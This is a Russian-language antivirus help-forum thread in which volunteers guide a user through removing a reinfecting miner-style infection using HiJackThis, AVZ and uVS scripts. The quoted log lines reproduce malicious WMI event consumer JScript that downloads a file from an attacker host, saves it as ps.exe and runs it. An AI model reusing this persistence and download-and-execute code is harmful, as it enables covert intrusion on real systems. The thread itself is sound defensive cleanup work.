m0nster Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Помогите уничтожить. Касперский находит, лечит, при перезагрузке появляется опять. Помогите уничтожить. Касперский находит, лечит, при перезагрузке появляется опять. CollectionLog-2018.10.30-07.41.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
SQ Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Здравствуйте,Сообщите пожалуйста, у Вас что прямой доступ к интернету? У Вас Firewall работает? Если работает закрывали ли порты SMB?HiJackThis (из каталога autologger)профикситьВажно: необходимо отметить и профиксить только то, что указано ниже. O4 - MSConfig\startupreg: BGClients [command] = C:\Windows\system32\cmd.exe /c start /min c:\windows\system32\wbem\123.bat (HKLM) (2018/10/29) O22 - Task: (disabled) ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe",2);var r = new ActiveXObject("WScript.Shell.1");r.Run(328 bytes) O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('54.255.141.50'+'\r\n'+'78.142.29.152'+'\r\n'+'74.222.14.61'+'\r\n'+'70.39.124.66');f.Close();}var(2698 bytes) AVZ выполнить следующий скрипт.Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора. begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('c:\windows\debug\ok.dat',''); QuarantineFile('c:\windows\system32\wbem\123.bat',''); RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BGClients','x32'); DeleteFile('c:\windows\system32\wbem\123.bat','32'); DeleteFile('c:\windows\debug\ok.dat','32'); DeleteSchedulerTask('ok'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится.После перезагрузки:- Выполните в AVZ: begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. quarantine.zip из папки AVZ загрузите этот архив через данную форму- Подготовьте лог AdwCleaner и приложите его в теме.Похоже экплуатируют уязвимость SMB, сообщите если вы установили обновления для Windows 7 x86:KB4012212KB4012215 Ссылка на комментарий Поделиться на другие сайты More sharing options...
m0nster Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 Все сдела, Не помогло. ПК стоит за роутером, в котором открыт только порт SQL. Обновления вроде устанавливаются автоматом. В HiJackThis у меня нет пунктов 025. Ссылка на комментарий Поделиться на другие сайты More sharing options...
SQ Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 В HiJackThis у меня нет пунктов 025. Использовали HiJackThis из каталога автологера? Ссылка на комментарий Поделиться на другие сайты More sharing options...
m0nster Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 (изменено) Конечно. AdwCleanerS03.txt Изменено 30 октября, 2018 пользователем m0nster Ссылка на комментарий Поделиться на другие сайты More sharing options...
SQ Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Если Вы точно не скачивали HiJackThis по ссылки, а использоватили из каталога автологгера, то приложите новые логи по правилам. Вы кстате замечали, что один из дисков дает сбои возможно он сыпится, по крайней мере записываются события об этом в логах. Имя компьютера: base Код события: 11 Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1. Номер записи: 207174 Источник: Disk Время записи: 20181030041104.952148-000 Тип события: Ошибка Пользователь: Имя компьютера: base Код события: 11 Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1. Номер записи: 207173 Источник: Disk Время записи: 20181030041103.452148-000 Тип события: Ошибка Пользователь: Имя компьютера: base Код события: 11 Сообщение: Драйвер обнаружил ошибку контроллера \Device\Harddisk1\DR1. Номер записи: 207172 Источник: Disk Время записи: 20181030041102.952148-000 Тип события: Ошибка Пользователь: ====== Журнал событий "Приложения" ====== ПК стоит за роутером, в котором открыт только порт SQL. Роутер случайно не Mikrotik? Ссылка на комментарий Поделиться на другие сайты More sharing options...
m0nster Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 Нет. F@ST1704N от Ростелекома. CollectionLog-2018.10.30-08.44.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
SQ Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Прверьте еще раз в HiJackThis из каталога автологера, там должны быть эти строки: O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe",2);var r = new ActiveXObject("WScript.Shell.1");r.Run(328 bytes) O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('54.255.141.50'+'\r\n'+'78.142.29.152'+'\r\n'+'74.222.14.61'+'\r\n'+'70.39.124.66');f.Close();}var(2698 bytes) P.S. По крайней мере в логах которые вы прислали они присутствуют, не может быть, чтобы они были только в логах. Нет. F@ST1704N от Ростелекома.Он у Вас не настроен в режиме моста (bridge)? Ссылка на комментарий Поделиться на другие сайты More sharing options...
m0nster Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 (изменено) После простоя пару часов во включенном состоянии (без доступа в сеть) появились все вирусы снова. Сделал лог. Модем в роутере, открыт только SQL порт. 025 удалил. CollectionLog-2018.10.30-13.31.zip Изменено 30 октября, 2018 пользователем m0nster Ссылка на комментарий Поделиться на другие сайты More sharing options...
SQ Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Насколько видно, вы не профиксили записи 025 в HiJackThis.Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS. Ссылка на комментарий Поделиться на другие сайты More sharing options...
m0nster Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 (изменено) Насколько видно, вы не профиксили записи 025 в HiJackThis. Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS. После перезапуска 025 пункты возвуращаються! BASE_2018-10-30_16-08-05_v4.1.1.7z Изменено 30 октября, 2018 пользователем m0nster Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 В HiJackThis у меня нет пунктов 025. сделайте скрин окна, чтобы было видно в чём вы пытаетесь фиксить и что их нет. Ссылка на комментарий Поделиться на другие сайты More sharing options...
m0nster Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 сделайте скрин окна, чтобы было видно в чём вы пытаетесь фиксить и что их нет. Ссылка на комментарий Поделиться на другие сайты More sharing options...
SQ Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Выполните скрипт в uVS: ;uVS v4.0.11 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c OFFSGNSAVE BREG zoo %SystemDrive%\PROGRAMDATA\DESKEYG.EXE delref %Sys32%\DRIVERS\37346692.SYS delref %Sys32%\DRIVERS\44689483.SYS delref %Sys32%\DRIVERS\56324358.SYS delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER] delref WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM_CONSUMER.[FUCKYOUMM_FILTER] delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL restart каталог zoo заархивируйте в zoo.zip и загрузите этот архив через данную форму Ссылка на комментарий Поделиться на другие сайты More sharing options...
m0nster Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 Отправил. Проблема осталась Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти